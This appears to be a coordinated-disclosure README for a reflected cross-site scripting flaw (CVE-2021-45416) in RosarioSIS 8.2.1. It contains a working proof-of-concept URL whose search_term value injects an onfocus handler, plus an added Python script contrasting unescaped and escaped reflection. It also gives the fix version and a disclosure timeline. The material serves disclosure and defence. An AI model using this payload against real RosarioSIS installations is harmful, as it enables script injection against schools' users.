
CVE-2021-45416 PoC: RosarioSIS cross-site scripting vulnerability

Associated Vulnerability
Title: RosarioSIS cross-site scripting vulnerability (CVE-2021-45416)
Description: RosarioSIS is a free and open-source student information system used to manage students, produce reports and support decision making. RosarioSIS 8.2.1 contains a reflected cross-site scripting vulnerability: an attacker can inject arbitrary HTML through the search_term parameter of the modules/Scheduling/Courses.php script.
Readme
# CVE-2021-45416
Reflected Cross-site scripting (XSS) vulnerability in RosarioSIS 8.2.1 allows attackers to inject arbitrary HTML via the search_term parameter in the modules/Scheduling/Courses.php script.

- Vendor: francoisjacquet
- Vendor Website: https://www.rosariosis.org/
- Affected Product: RosarioSIS
- Affected Versions: v8.2.1, however it is _assumed_ earlier versions might be affected as well

---

### Instructions to reproduce
- Use RosarioSIS 8.2.1.
- Open the URL vulnerable to XSS: http://localhost/rosariosis/Modules.php?modname=misc/ChooseCourse.php&modfunc=choose_course&course_modfunc=search&last_year=&search_term=%22%20onfocus%3D%22alert%28%60XSS%60%29 (replace `localhost/rosariosis` with your web server's path). The `search_term` value URL-decodes to `" onfocus="alert(`XSS`)`: the leading double quote closes the attribute the term is reflected into, and the rest adds an `onfocus` event handler.
- **Note that this page needs to be opened in a popup window, for example using the JavaScript `window.open()` method. A proof-of-concept page (`RosarioSIS_PoC.htm`) that does this is available in this repo.**

### Cause
User-supplied input in the search_term parameter is improperly neutralized in the modules/Scheduling/Courses.php script, which is accessible through ChooseCourse.php and ChooseRequest.php as shown in the proof of concept that you can find in this repo.
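To make the mechanism concrete, the following is an added Python example, not code from the RosarioSIS project or from this repo. It decodes the `search_term` value from the PoC URL above, reflects it into an `<input value="...">` attribute the way the advisory describes the unfixed script doing, and beside that renders the same term with attribute-context escaping, which neutralises it. The template strings, the naive attribute parser and the function names are assumptions made for this illustration; RosarioSIS itself is PHP, where `html.escape(s, quote=True)` corresponds to `htmlspecialchars($s, ENT_QUOTES)`.

```python
"""Attribute-context reflected XSS: unescaped reflection beside the escaped form.

Added illustration, not RosarioSIS code. The HTML templates below are an
assumption modelling the pattern the advisory describes (search term reflected
into an <input> value attribute without neutralisation).
"""
import html
import re
from urllib.parse import parse_qs, urlsplit

# PoC URL from the advisory; host and path are whatever the installation uses.
POC_URL = (
    "http://localhost/rosariosis/Modules.php?modname=misc/ChooseCourse.php"
    "&modfunc=choose_course&course_modfunc=search&last_year="
    "&search_term=%22%20onfocus%3D%22alert%28%60XSS%60%29"
)


def search_term_from_url(url: str) -> str:
    """Return the percent-decoded search_term query parameter ('' if absent)."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("search_term", [""])[0]


def render_vulnerable(search_term: str) -> str:
    """Reflect the term into the attribute unescaped (the behaviour the advisory describes)."""
    return f'<input type="text" name="search_term" value="{search_term}">'


def render_fixed(search_term: str) -> str:
    """Escape for an attribute context: '"' becomes &quot;, so the value cannot
    close the attribute and no new attribute can be smuggled in."""
    return f'<input type="text" name="search_term" value="{html.escape(search_term, quote=True)}">'


# Minimal attribute matcher for a single double-quoted-attribute tag; enough to
# show whether the reflected term stayed inside the value attribute or not.
_ATTR_RE = re.compile(r'\s([a-zA-Z-]+)="([^"]*)"')


def attributes(tag: str) -> dict:
    """Map attribute name -> raw attribute value as a browser would tokenise it."""
    return dict(_ATTR_RE.findall(tag))


def injected_handlers(tag: str) -> list:
    """Names of any on* event-handler attributes present in the tag."""
    return [name for name in attributes(tag) if name.lower().startswith("on")]


if __name__ == "__main__":
    term = search_term_from_url(POC_URL)
    print("decoded search_term:", term)
    for label, render in (("vulnerable", render_vulnerable), ("fixed", render_fixed)):
        tag = render(term)
        print(f"{label:>10}: {tag}")
        print(f"{'':>10}  event handlers: {injected_handlers(tag)}")
```

Running the script prints the decoded payload, the unescaped tag in which `onfocus` has become a real attribute, and the escaped tag in which the whole payload is still the literal text of `value`. The same check (parse the response, look for attributes that were not in the template) is a reasonable regression test to keep around after upgrading.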

### Solution
Update to the latest version of RosarioSIS. This issue was fixed in version v8.3.

### References 
- YouTube video showing the proof of concept: https://www.youtube.com/watch?v=PvFUxSGpWpY
- Commit containing the fix: https://gitlab.com/francoisjacquet/rosariosis/-/commit/aec018065ca12ecef03ee454a8112f992ea35315
- Changelog for version v8.3: https://gitlab.com/francoisjacquet/rosariosis/blob/mobile/CHANGES.md#changes-in-83

---

#### History (in the format dd.mm.yyyy)
- 01.02.2022 - CVE published by MITRE
- 27.01.2022 - CVE was assigned and marked as reserved
- 17.12.2021 - Requested CVE through MITRE webform
- 22.10.2021 - Vendor released new version containing the fix (v8.3)
- 20.10.2021 - Received reply from vendor, along with a link to a new commit fixing the issue and the announcement that a new release containing the fix will follow in the same week. Vendor asked me to wait two months after that release before public disclosure.
- 20.10.2021 - Initial report to vendor
- 20.10.2021 - Finding of vulnerability